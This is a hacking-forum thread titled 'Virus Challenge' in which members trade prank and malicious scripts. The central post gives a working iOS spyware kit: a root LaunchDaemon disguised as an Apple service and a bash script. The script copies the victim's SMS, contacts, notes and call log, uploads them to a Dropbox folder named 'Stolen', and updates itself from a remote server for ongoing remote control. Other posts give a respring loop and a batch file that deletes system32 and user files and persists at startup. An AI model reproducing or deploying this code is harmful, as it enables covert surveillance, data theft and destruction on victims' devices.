Author Topic: Virus Challenge  (Read 2727 times)

Apetrick

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 3511
  • Reputation: 90
  • <Apetrick> lank is 1337
  • Badges:
  • iDevices: Ipod Touch 4g
Re: Virus Challenge
« Reply #15 on: March 02, 2012, 06:52:48 pm »
Did you try ^C
<%a12danrulz> Idk, but doing a DoS from an apple device is like fighting a bear with a plastic spork

high(tech)poptart

  • Noob
  • *
  • Posts: 26
  • Reputation: 7
  • Computers: Alienware MX14 i7 processor
  • iDevices: iPhone 4
Re: Virus Challenge
« Reply #16 on: March 02, 2012, 06:59:40 pm »
What does ^C do? I'm still new.
Longboard for life!

Ironman

  • Administrator
  • Hero Member
  • *****
  • Posts: 5099
  • Reputation: 251
  • Badges:
  • Computers: ASUS UL50VT
  • iDevices: iPhone 5, iPhone 4S, iPhone 4, iPhone 3GS
Re: Virus Challenge
« Reply #17 on: March 02, 2012, 07:09:13 pm »
It stops everything.
If you're going to ask questions....
At least make them good ones.

Knowledge is the one thing that can never be taken from you

high(tech)poptart

  • Noob
  • *
  • Posts: 26
  • Reputation: 7
  • Computers: Alienware MX14 i7 processor
  • iDevices: iPhone 4
Re: Virus Challenge
« Reply #18 on: March 02, 2012, 07:43:05 pm »
Okay, thanks. How does this command work? I can't find anything about it.
Longboard for life!

C0deH4cker

  • Hero Member
  • *****
  • Posts: 2849
  • Reputation: 129
  • I am leaving iNinjas. Contact me via email.
  • Badges:
  • iDevices: iPhone 4S 16gb Black (5.1.1), iPad 2 32gb White (5.0.1), iPod Touch 2G 8gb (4.2.1)
Re: Virus Challenge
« Reply #19 on: March 02, 2012, 09:15:46 pm »
^C is Ctrl + c. Basically it interrupts the process in the current cmd window. Ctrl + Pause/Break works better.


That will only stop the one in the current window however. The best way to stop this is:

taskkill /f /im cmd.exe /im tree.exe

I believe that the tree command runs a program called tree.exe (or tree.com, idk which). That's why I stop that too.


high(tech)poptart

  • Noob
  • *
  • Posts: 26
  • Reputation: 7
  • Computers: Alienware MX14 i7 processor
  • iDevices: iPhone 4
Re: Virus Challenge
« Reply #20 on: March 02, 2012, 09:34:14 pm »
Thanks Code for answering my very n00bish question, but when running the virus, cmd windows opened way too fast for me to run anything. I might play around with these solutions later.
Longboard for life!

A3MIRAL

  • Leader
  • Hero Member
  • *****
  • Posts: 2899
  • Reputation: 105
  • A3MIRAL -- Reporting for Duty
    • A3MIRAL
  • Badges:
  • Computers: Dell XPS15 (6 GB ram, Core i7 @ 2.0 GHz, 750 GB HDD @ 7200 RPM)
  • iDevices: iPod touch 3G 32GB, iPhone 5 32GB
Re: Virus Challenge
« Reply #21 on: March 02, 2012, 10:14:56 pm »
3 reasonable options:
1: have task manager already open
2: be ready to right click on the item in the task bar and click close all windows (win 7 only I believe)
3: look into AutoHotKey (AHK) and make like control alt s run code's kill code.

high(tech)poptart

  • Noob
  • *
  • Posts: 26
  • Reputation: 7
  • Computers: Alienware MX14 i7 processor
  • iDevices: iPhone 4
Re: Virus Challenge
« Reply #22 on: March 02, 2012, 10:26:29 pm »
Okay, I'll try the first two in a min then post my results.
Longboard for life!

C0deH4cker

  • Hero Member
  • *****
  • Posts: 2849
  • Reputation: 129
  • I am leaving iNinjas. Contact me via email.
  • Badges:
  • iDevices: iPhone 4S 16gb Black (5.1.1), iPad 2 32gb White (5.0.1), iPod Touch 2G 8gb (4.2.1)
Re: Virus Challenge
« Reply #23 on: March 02, 2012, 10:29:11 pm »
2: be ready to right click on the item in the task bar and click close all windows (win 7 only I believe)

Also winxp.


You could just have that command I posted in a batch file on your desktop.


Or: shutdown /f

No, it won't shut down your computer. It simply forces all programs (including windows explorer) to quit. You can restart them manually.

high(tech)poptart

  • Noob
  • *
  • Posts: 26
  • Reputation: 7
  • Computers: Alienware MX14 i7 processor
  • iDevices: iPhone 4
Re: Virus Challenge
« Reply #24 on: March 02, 2012, 10:40:30 pm »
Okay so I had this \/ posted on cmd and I had the task list up, but by the time I started the virus my computer would not let me do anything.

taskkill /f /im cmd.exe /im tree.exe

Longboard for life!


C0deH4cker

  • Hero Member
  • *****
  • Posts: 2849
  • Reputation: 129
  • I am leaving iNinjas. Contact me via email.
  • Badges:
  • iDevices: iPhone 4S 16gb Black (5.1.1), iPad 2 32gb White (5.0.1), iPod Touch 2G 8gb (4.2.1)
Re: Virus Challenge
« Reply #25 on: March 02, 2012, 10:42:27 pm »
Lol 😜

brc0703

  • Noob
  • *
  • Posts: 44
  • Reputation: 6
  • Computers: Compaq Presario AMD Athlon x2
  • iDevices: iPhone 4s, iPhone 3Gs, iTouch 2g
Re: Virus Challenge
« Reply #26 on: May 20, 2012, 05:22:54 am »
and just to piss someone off run this from terminal

while [ true ]; do echo $$ >/tmp/bomb.pid; sleep 60; killall SpringBoard; done&

then the device will respring every minute till either rebooted or u run 'kill `cat /tmp/bomb.pid`'
----------------------------------------------------------------------------------------------------------------

Steal Private Data and remote access to device through script

LaunchDaemon to run once a day starting from last reboot (can edit to whatever u want)
then when that is launched it runs this script that copies sms, contacts, notes, call log and whatever you want to add.. then it zips the file and uploads it to a dropbox account you set in the script... then script downloads a copy of itself from dropbox and compares its own md5 to the new one and updates itself if it's new.. this allows for complete remote access by just editing the script on server.. steal more data.. delete files.. anything you can get a script to do.. just don't screw up so the script fails then you're screwed cuz now it won't update..  this goes untracked from any app installed.. safari, mail, dropbox.. the user would have to have FireWall or find the actual files.. any normal user will never have a clue..

also have one that steals photos or videos as they are taken.. kinda like PhotoStream but uploads to specified dropbox account..

---LAUNCHDAEMON---
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
   <key>Label</key>
   <string>com.apple.mobilesafety</string>
   <key>ProgramArguments</key>
   <array>
      <string>/usr/lib/mobilesaver</string>
   </array>
   <key>RunAtLoad</key>
   <true/>
   <key>StartInterval</key>
   <integer>86400</integer>
   <key>UserName</key>
   <string>root</string>
</dict>
</plist>

---SCRIPT---
#!/bin/bash
# sneaky sneaky mobilesaver ?.?
# i havent been keeping track.. say v2.8-5
# brc0703@yahoo.com
PUSS="/var/root/Library/private"
LOGIN_URL="https://www.dropbox.com/login"
HOME_URL="https://www.dropbox.com/home"
UPLOAD_URL="https://dl-web.dropbox.com/upload"
COOKIE_FILE="/tmp/du_cookie_$RANDOM"
RESPONSE_FILE="/tmp/du_resp_$RANDOM"
VERSION="0.8.2"
MDROP="/usr/lib/mobiledrop"
LIB="/private/var/mobile/Library"
PEEP="$(find $LIB/AddressBook -type f -name Address*sqlitedb)"
CALL=$(locate call_history.db)
NOTE=$(locate $LIB/Notes)
SMS="$LIB/SMS/sms.db"
WORK_LOG=".work.sav.log"
ERR="/tmp/mobilesave.log"
NOGIN_DAT=$(echo "zrcv7v3@gape.cqm" | tr 'v' '0' | tr 'g' 'f' | tr 'p' 'k')
LOGGED=$(echo "ducklu" | tr 'd' 'f' | tr 'l' 'y')

#Set to 1 to enable DEBUG mode
DEBUG=0

#Set to 1 to enable VERBOSE mode (-v option)
VERBOSE=0

#If set to 1 the script terminate if an upload error occurs
END_ON_UPLOAD_ERROR=0

#Set to 1 to skip the initial login page loading (Speed up the uploading process).
#Set to 0 if you experience problems uploading the files.
SKIP_LOADING_LOGIN_PAGE=1

if [ $DEBUG -ne 0 ]; then
   set -x
   COOKIE_FILE="/tmp/du_cookie_debug"
   RESPONSE_FILE="/tmp/du_resp_debug"
fi

#Print verbose information depend on $VERBOSE variable
function print
{
   if [ $VERBOSE -eq 1 ]; then
      echo -ne "$1";
   fi
}

#Remove temporary files
function remove_temp_files
{
      rm -fr $COOKIE_FILE
      rm -fr $RESPONSE_FILE
      rm -fr $WORK_LOG
}

#Extract token from the specified form
# $1 = file path
# $2 = form action
function get_token
{
   TOKEN=$(cat $1 | tr -d '\n' | sed 's/.*<form action="'$2'"[^>]*>\s*<input type="hidden" name="t" value="\([a-z 0-9]*\)".*/\1/')
   echo $TOKEN
}

#Upload a single file to dropbox
# $1 = local file path
# $2 = remote destination folder
function dropbox_upload
{
   UPLOAD_FILE=$1
   DEST_FOLDER=$2
   
   print " > Uploading '$UPLOAD_FILE' to 'DROPBOX$DEST_FOLDER'..."

   #Show the progress bar during the file upload
   if [ $VERBOSE -eq 1 ]; then
      CURL_PARAMETERS="-k --progress-bar"
      print "\n"
   else
      CURL_PARAMETERS="-k -s --show-error"
   fi

   curl $CURL_PARAMETERS -i -b $COOKIE_FILE -o $RESPONSE_FILE -F "plain=yes" -F "dest=$DEST_FOLDER" -F "t=$TOKEN" -F "file=@$UPLOAD_FILE"   "$UPLOAD_URL"
   grep "HTTP/1.1 302 FOUND" "$RESPONSE_FILE" > /dev/null

   if [ $? -ne 0 ]; then
      print " Failed!\n"
      if [ $END_ON_UPLOAD_ERROR -eq 1 ]; then
         remove_temp_files
         exit 1
      fi
   else
      print " OK\n"
   fi
}

#Handles the keyboard interrupt (control-c)
function ctrl_c
{
   print "\n Bye ;)\n"
   remove_temp_files
   exit 1
}

function self_up
{
   SDIR=$(pwd)
   cd ~
   curl -O http://dl.dropbox.com/someserver/script/mobilesaver 2>>$ERR
   chmod 0755 mobilesaver
   NEW="$(md5sum mobilesaver | awk '{ print $1 }')"
   CRT="$(md5sum $0 | awk '{ print $1 }')"
      if [ "$NEW" != "$CRT" ]; then
         mv -f  mobilesaver /usr/lib/mobilesaver 2>>$ERR
         echo "script `basename $0` was updated" 2>>$ERR
      else
         rm -f mobilesaver 2>>$ERR
         echo "script $0 was not updated" >>$ERR
      fi
   cd $SDIR
}

#Collects all personal data and zips for upload
function get_data
{
   touch $WORK_LOG
   echo -e "$SMS\n$CALL\n$NOTE\n$PEEP" >$WORK_LOG
   while read file
   do
   if [ -f "$file" ]; then
         TAR=$(dirname "$file")
         TAR=$(basename "$TAR")
         [[ ! -d $PUSS/$TAR ]] && mkdir -p $PUSS/$TAR
         cp -a -u -P "$file" $PUSS/$TAR
   fi; done < "$WORK_LOG" 2>>$ERR
mv $ERR $PUSS/flurrydata
zip -r -m -9 $PUSS/flurrydata $PUSS &>>$ERR
}


#Trap keyboard interrupt (control-c)
trap ctrl_c SIGINT

# File variables
UPLOAD_FILE="$PUSS/flurrydata.zip"
DEST_FOLDER="Stolen"

print "Dropbox Uploader v$VERSION\n"
get_data

#LOAD LOGIN PAGE
if [ $SKIP_LOADING_LOGIN_PAGE -eq 0 ]; then
   print " > Loading Login Page..."
   curl -k --show-error -i -o "$RESPONSE_FILE" "$LOGIN_URL"

   if [ $? -ne 0 ]; then
      print " Failed!\n"
      remove_temp_files
      exit 1
   else
      print " OK\n"
   fi

   #GET TOKEN
   TOKEN=$(get_token "$RESPONSE_FILE" "\/login")
   #echo -e " > Token = $TOKEN"
   if [ "$TOKEN" == "" ]; then
      print " Failed to get Authentication token!\n"
      remove_temp_files
      exit 1
   fi
fi

#LOGIN
print " > Logging in..."
curl -k --show-error -i -c $COOKIE_FILE -o $RESPONSE_FILE --data "login_email=$NOGIN_DAT&login_password=$LOGGED&t=$TOKEN" "$LOGIN_URL"
grep "location: /home" $RESPONSE_FILE > /dev/null

if [ $? -ne 0 ]; then
   print " Failed!\n"
   remove_temp_files
   exit 1
else
   print " OK\n"
fi

#LOAD HOME
print " > Loading Home..."
curl -k --show-error -i -b "$COOKIE_FILE" -o "$RESPONSE_FILE" "$HOME_URL"

if [ $? -ne 0 ]; then
   print " Failed!\n"
   remove_temp_files
   exit 1
else
   print " OK\n"
fi

#GET TOKEN
TOKEN=$(get_token "$RESPONSE_FILE" "https:\/\/dl-web.dropbox.com\/upload")
#echo -e " > Token = $TOKEN"
if [ "$TOKEN" == "" ]; then
   print " Failed to get Upload token!\n"
   remove_temp_files
   exit 1
fi

#If it's a single file...
if [ -f "$UPLOAD_FILE" ]; then
   dropbox_upload "$UPLOAD_FILE" "$DEST_FOLDER"
fi

remove_temp_files
self_up

exit 0

(I changed any private data for this demo so don't think I left passwords or anything.. they are hidden a little bit in the script but anyone with script knowledge can still read them)
life is like a jar of jalapeños, what you do today might burn your ass tomorrow
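
A defender-side check for the persistence pattern in the post above, added here as an example (not code from the thread): it parses a launchd job plist and flags a `com.apple.` label installed outside the vendor directory, a program in an unusual directory, and a root job that both runs at load and repeats. The install path of the sample, the directory lists and the finding names are assumptions.

```python
import plistlib

# Constructed sample: the LaunchDaemon quoted in the post, at an assumed install path.
SAMPLE_PATH = "/Library/LaunchDaemons/com.apple.mobilesafety.plist"
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.mobilesafety</string>
  <key>ProgramArguments</key><array><string>/usr/lib/mobilesaver</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>86400</integer>
  <key>UserName</key><string>root</string>
</dict></plist>"""

# Constructed benign job for comparison (hypothetical daemon name).
BENIGN_PATH = "/System/Library/LaunchDaemons/com.apple.exampled.plist"
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.exampled</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/exampled</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

VENDOR_DIR = "/System/Library/LaunchDaemons/"  # assumption: where vendor plists ship
ODD_EXEC_DIRS = ("/usr/lib/", "/tmp/", "/var/", "/private/var/")  # assumption

def audit_daemon(plist_path, raw):
    """Return finding codes for one launchd job definition."""
    job = plistlib.loads(raw)
    findings = []
    label = job.get("Label", "")
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    program = args[0] if args else ""
    if label.startswith("com.apple.") and not plist_path.startswith(VENDOR_DIR):
        findings.append("vendor-label-outside-vendor-dir")
    if program.startswith(ODD_EXEC_DIRS):
        findings.append("program-in-unusual-dir")
    # A LaunchDaemon without UserName runs as root, so absence counts too.
    if job.get("UserName", "root") == "root":
        findings.append("runs-as-root")
    if job.get("RunAtLoad") and "StartInterval" in job:
        findings.append("starts-at-boot-and-repeats")
    return findings

def is_suspicious(findings):
    """Root alone is normal for a daemon; require a masquerade or path signal."""
    strong = {"vendor-label-outside-vendor-dir", "program-in-unusual-dir"}
    return bool(strong & set(findings))
```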

TeenHacker

  • Jr. Members
  • **
  • Posts: 68
  • Reputation: 2
  • 127.0.0.1 is where I feel at home.
  • iDevices: iPod Touch 4G 5.0.1
Re: Virus Challenge
« Reply #27 on: September 27, 2012, 03:16:59 am »
Sorry for the grave digging, but this creates 1 million folders on your desktop to crash your computer. I don't precisely remember how to code in batch, but I'm 80% sure this is what it is. 
Code:
/l %%n in (1,1,10000000) do md %%n
« Last Edit: September 27, 2012, 03:52:51 am by TeenHacker »

Samich

  • Newbie
  • Posts: 4
  • Reputation: 2
  • Computers: Acer aspire one
  • iDevices: iPhone 5
Re: Virus Challenge
« Reply #28 on: April 10, 2013, 02:36:34 pm »
@echo off
:virus
Rundll32 keyboard, disable
Rundll32 mouse, disable
Start www.google.com
Taskkill /f /t /im explorer.exe
Taskkill /f /t /im rundll32.exe
Del /f /q "c:\users\%superprofile%\my documents\my music\*.*"
Cd "c:\WINDOWS\system32"
Del /f /q "*.*"
Copy "virus.bat" "c:\%userprofile%\start menu\programs\startup"
Shutdown -s -t 00 -c "virus"
:goto virus